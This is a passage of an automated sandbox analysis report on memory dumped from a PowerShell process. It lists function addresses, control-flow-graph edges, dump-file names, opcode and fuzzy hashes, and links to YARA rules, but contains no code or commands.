                                    control_flow_graph 814 7ffd9b9816bd-7ffd9b9816c7 815 7ffd9b9816ce-7ffd9b9816df 814->815 816 7ffd9b9816c9 814->816 818 7ffd9b9816e1 815->818 819 7ffd9b9816e6-7ffd9b9816f7 815->819 816->815 817 7ffd9b9816cb 816->817 817->815 818->819 820 7ffd9b9816e3 818->820 821 7ffd9b9816fe-7ffd9b98170f 819->821 822 7ffd9b9816f9 819->822 820->819 824 7ffd9b981711 821->824 825 7ffd9b981716-7ffd9b981727 821->825 822->821 823 7ffd9b9816fb 822->823 823->821 824->825 826 7ffd9b981713 824->826 827 7ffd9b98172e-7ffd9b981744 825->827 828 7ffd9b981729 825->828 826->825 830 7ffd9b981747-7ffd9b98174c 827->830 831 7ffd9b981745-7ffd9b981746 827->831 828->827 829 7ffd9b98172b 828->829 829->827 832 7ffd9b98174f-7ffd9b981798 830->832 833 7ffd9b98174e 830->833 831->830 836 7ffd9b98179a 832->836 837 7ffd9b9817b5-7ffd9b9817fe 832->837 833->832 836->837 839 7ffd9b981804-7ffd9b98180e 837->839 840 7ffd9b981a39-7ffd9b981a76 837->840 841 7ffd9b981810-7ffd9b981825 839->841 842 7ffd9b981827-7ffd9b98182c 839->842 856 7ffd9b981aa1-7ffd9b981ae5 840->856 857 7ffd9b981a78-7ffd9b981a8f 840->857 841->842 843 7ffd9b981832-7ffd9b981837 842->843 844 7ffd9b9819cc-7ffd9b9819d6 842->844 849 7ffd9b981881 843->849 850 7ffd9b981839-7ffd9b98184c 843->850 847 7ffd9b9819e9-7ffd9b981a36 844->847 848 7ffd9b9819d8-7ffd9b9819e8 844->848 847->840 853 7ffd9b981883-7ffd9b981885 849->853 850->840 863 7ffd9b981852-7ffd9b98185c 850->863 853->844 859 7ffd9b98188b-7ffd9b981892 853->859 876 7ffd9b981a92-7ffd9b981a9c 857->876 877 7ffd9b981a91 857->877 859->844 860 7ffd9b981898-7ffd9b9818a3 859->860 865 7ffd9b9818b3 860->865 866 7ffd9b9818a5-7ffd9b9818af 860->866 867 7ffd9b98185e-7ffd9b98186c 863->867 868 7ffd9b981876-7ffd9b98187f 863->868 872 7ffd9b9818b8-7ffd9b9818cd 865->872 869 7ffd9b9818b1 866->869 870 7ffd9b9818cf-7ffd9b9818e5 866->870 867->868 880 7ffd9b98186e-7ffd9b981874 867->880 868->853 869->872 870->865 883 7ffd9b9818e7-7ffd9b9818f1 870->883 872->870 881 7ffd9b981a9f-7ffd9b981aa0 876->881 882 7ffd9b981a9e 876->882 877->876 880->868 881->856 882->881 885 7ffd9b9818f3-7ffd9b981900 883->885 886 7ffd9b98190a-7ffd9b981978 883->886 885->886 891 7ffd9b981902-7ffd9b981908 885->891 897 7ffd9b98197a-7ffd9b981996 886->897 898 7ffd9b981998-7ffd9b9819b6 886->898 891->886 897->898 900 7ffd9b9819bc-7ffd9b9819cb 898->900
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2982458225.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ffd9b980000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9767a20cb7f1a96b305346a31a3c8f8dac135057721fc2ec96b034daf1c39aeb
                                    • Instruction ID: c2f80d275ebb2514a9196b6c90359277b64b1b4481c3ec97535ca563ab04dd17
                                    • Opcode Fuzzy Hash: 9767a20cb7f1a96b305346a31a3c8f8dac135057721fc2ec96b034daf1c39aeb
                                    • Instruction Fuzzy Hash: 42F15D71A1EB991FD766C76898215B47FE0EF5A314B0A02FFD08DC71B3DA299906C381
                                    Function 00007FFD9B983401 Relevance: .5, Instructions: 462COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 902 7ffd9b983401-7ffd9b98344f 904 7ffd9b983666-7ffd9b9836c4 902->904 905 7ffd9b983455-7ffd9b98345f 902->905 925 7ffd9b9836ef-7ffd9b983717 904->925 926 7ffd9b9836c6-7ffd9b9836dd 904->926 906 7ffd9b983461-7ffd9b983479 905->906 907 7ffd9b98347b-7ffd9b983488 905->907 906->907 912 7ffd9b98348e-7ffd9b983491 907->912 913 7ffd9b9835fb-7ffd9b983605 907->913 912->913 916 7ffd9b983497-7ffd9b98349f 912->916 918 7ffd9b983618-7ffd9b983663 913->918 919 7ffd9b983607-7ffd9b983617 913->919 916->904 920 7ffd9b9834a5-7ffd9b9834af 916->920 918->904 923 7ffd9b9834b1-7ffd9b9834bf 920->923 924 7ffd9b9834c9-7ffd9b9834cf 920->924 923->924 931 7ffd9b9834c1-7ffd9b9834c7 923->931 924->913 930 7ffd9b9834d5-7ffd9b9834d8 924->930 944 7ffd9b983720-7ffd9b98372f 925->944 945 7ffd9b983719 925->945 941 7ffd9b9836e0-7ffd9b9836ed 926->941 942 7ffd9b9836df 926->942 932 7ffd9b983521 930->932 933 7ffd9b9834da-7ffd9b9834ed 930->933 931->924 935 7ffd9b983523-7ffd9b983525 932->935 933->904 948 7ffd9b9834f3-7ffd9b9834fd 933->948 935->913 939 7ffd9b98352b-7ffd9b98352e 935->939 946 7ffd9b983530-7ffd9b983539 939->946 947 7ffd9b983545-7ffd9b983549 939->947 941->925 942->941 949 7ffd9b983731 944->949 950 7ffd9b983738-7ffd9b983780 944->950 945->944 946->947 947->913 958 7ffd9b98354f-7ffd9b983555 947->958 954 7ffd9b9834ff-7ffd9b983514 948->954 955 7ffd9b983516-7ffd9b98351f 948->955 949->950 965 7ffd9b983782 950->965 966 7ffd9b98379d-7ffd9b9837f1 950->966 954->955 955->935 960 7ffd9b983571-7ffd9b983577 958->960 961 7ffd9b983557-7ffd9b983564 958->961 963 7ffd9b983593-7ffd9b9835b5 960->963 964 7ffd9b983579-7ffd9b983586 960->964 961->960 971 7ffd9b983566-7ffd9b98356f 961->971 979 7ffd9b9835bc-7ffd9b9835c0 963->979 964->963 972 7ffd9b983588-7ffd9b983591 964->972 965->966 971->960 972->963 982 7ffd9b9835c7-7ffd9b9835d0 979->982 984 7ffd9b9835d2-7ffd9b9835e7 982->984 985 7ffd9b9835e9-7ffd9b9835fa 982->985 984->985
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2982458225.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ffd9b980000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 53f7933a3687e5b9a421f57b33f37d423614ed53851824e838c8007ca9e095a3
                                    • Instruction ID: 3c2c821fe09db9bd5129bcbcdc0c66357090b89f4bf48974bd3ad625e2f417c0
                                    • Opcode Fuzzy Hash: 53f7933a3687e5b9a421f57b33f37d423614ed53851824e838c8007ca9e095a3
                                    • Instruction Fuzzy Hash: D4D13722B1FF8D2FE7A9966C58665743BD1EF55210B0901FEE44DC71E3EE28AD068341
                                    Function 00007FFD9B98118C Relevance: .3, Instructions: 349COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2982458225.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ffd9b980000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6f0c040f395a5c62bb40e7e0b17778bd8b41f82dfbbc32a80830058807ba107d
                                    • Instruction ID: fdd0d47febe458cc72e3862a49610fedd5d6dfa93175696d59268e308285277b
                                    • Opcode Fuzzy Hash: 6f0c040f395a5c62bb40e7e0b17778bd8b41f82dfbbc32a80830058807ba107d
                                    • Instruction Fuzzy Hash: 0DA14722B1EE9D1FE7B6966C58345B43BE1EF9A214B0A01FBD05DCB1E3DD28AD058341
                                    Function 00007FFD9B9817A1 Relevance: .3, Instructions: 258COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2982458225.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ffd9b980000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4c1155cb50be676654046194aa090067259c67e57d2bb1abc8cef7491467b21c
                                    • Instruction ID: ff36593a87f8de10cbce36fcc70979105ffc8a97ef7a79d850154e6143646e7b
                                    • Opcode Fuzzy Hash: 4c1155cb50be676654046194aa090067259c67e57d2bb1abc8cef7491467b21c
                                    • Instruction Fuzzy Hash: 3F715631A2DE5C5FE7A8DB2898656B837D1EF9D318F06027ED04DC31A2DE35A8428381
                                    Function 00007FFD9B9811A1 Relevance: .2, Instructions: 161COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2982458225.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ffd9b980000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 82dfc0d55599939c30a2ea7ee60f8e5d7e5487a0c1cf70212cc9d4bfd7b022a9
                                    • Instruction ID: 091481e5f3e45493cc3be078525b135742b43ef6352a1c21bba7f51ba44e205a
                                    • Opcode Fuzzy Hash: 82dfc0d55599939c30a2ea7ee60f8e5d7e5487a0c1cf70212cc9d4bfd7b022a9
                                    • Instruction Fuzzy Hash: F2416A23F2FE6E1BE7B4926C08742B427C1EF8C615F4A017AD45DCB1E6DD28AD024241
                                    Function 00007FFD9B98353D Relevance: .1, Instructions: 95COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2982458225.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ffd9b980000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ab5d4fbf8fafa3817a4566bb3a1d689198f61f0d61a2db4a30c83a6b73aee1bc
                                    • Instruction ID: 9f7acf902304bb5422b0ef6c7aea03ff97e1f574fc2b6117a98304005b27ccd1
                                    • Opcode Fuzzy Hash: ab5d4fbf8fafa3817a4566bb3a1d689198f61f0d61a2db4a30c83a6b73aee1bc
                                    • Instruction Fuzzy Hash: DE21F813F2FE5D2BE7B9926C283517427C1EF44A14B4A02BAF45DC71E3ED286D064142

                                    Non-executed Functions

                                    Function 00007FFD9B8EC518 Relevance: 3.4, Strings: 2, Instructions: 863COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2981823478.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: }$?N_H
                                    • API String ID: 0-2384390316
                                    • Opcode ID: 239c23c4b251aefea78222a826cd0bacf9a95f90a822f1854e17cd8c46b354c0
                                    • Instruction ID: a254526ab02aa4ea1fcf851aa0a44cba72d2dafda4db411d87f3c9689ca5692c
                                    • Opcode Fuzzy Hash: 239c23c4b251aefea78222a826cd0bacf9a95f90a822f1854e17cd8c46b354c0
                                    • Instruction Fuzzy Hash: E7425A61B0D7894FD71AAB6898255F57BE0EF9A314F0942FBD089CB1E3DD18AC46C381
                                    Function 00007FFD9B8BF67D Relevance: 1.6, Strings: 1, Instructions: 305COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2981823478.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: -V_L
                                    • API String ID: 0-1499772637
                                    • Opcode ID: 66aab10ab021f2ee296efb39bb82a9ffb7f5ff018284d00dd8536bd8066745cd
                                    • Instruction ID: f5248400df10f2e319937eb46188c38d5224d2058dc840656e6b744b6eefff86
                                    • Opcode Fuzzy Hash: 66aab10ab021f2ee296efb39bb82a9ffb7f5ff018284d00dd8536bd8066745cd
                                    • Instruction Fuzzy Hash: 0791E561F0DA494FEBACDB789864A7477D2EFA9340B0641BED01DC72F2DD29AC418780
                                    Function 00007FFD9B8C7B58 Relevance: .9, Instructions: 897COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2981823478.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 76ace900d80aa05dba7593c9b8f5d62424dc1a56b2b127a38141942320c1cd24
                                    • Instruction ID: 0a074c6ec28602422e00bf728514f0e848bdffd71475add8bb52ce8d1dd52809
                                    • Opcode Fuzzy Hash: 76ace900d80aa05dba7593c9b8f5d62424dc1a56b2b127a38141942320c1cd24
                                    • Instruction Fuzzy Hash: E242E431B1DA494BEBACAB5C94656B573D2FF98300F0141BDE44EC36E3EE35A9028681
                                    Function 00007FFD9B8D5F50 Relevance: .8, Instructions: 775COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2981823478.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3f3ef12ef55af974522dd1bd0a02968194ac43c5440aaf208986987eda45e007
                                    • Instruction ID: 7c5edae63c327a17d1afe98d3855d1b22c1583cbcc8c17db78f201e1c04f6a6d
                                    • Opcode Fuzzy Hash: 3f3ef12ef55af974522dd1bd0a02968194ac43c5440aaf208986987eda45e007
                                    • Instruction Fuzzy Hash: 8432C470B1DA0D4FEBA8EB5C9465A7977E2FF98350F0502BAE44DC72A6DE24EC418740
                                    Function 00007FFD9B8C752D Relevance: .6, Instructions: 570COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2981823478.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2491b9767a9ae61a04416cc5ffe5493617fa883a08a3d83b84c5c2db4036ae89
                                    • Instruction ID: eb0f4357a9a64a5af29e98c4e61363fde7e635bcc78b737981f652c6cdf8322e
                                    • Opcode Fuzzy Hash: 2491b9767a9ae61a04416cc5ffe5493617fa883a08a3d83b84c5c2db4036ae89
                                    • Instruction Fuzzy Hash: 29F10431B0DA0A4FD768EB68D455AB577E1EF99310F1042BED44DC72A6EE24AC42C781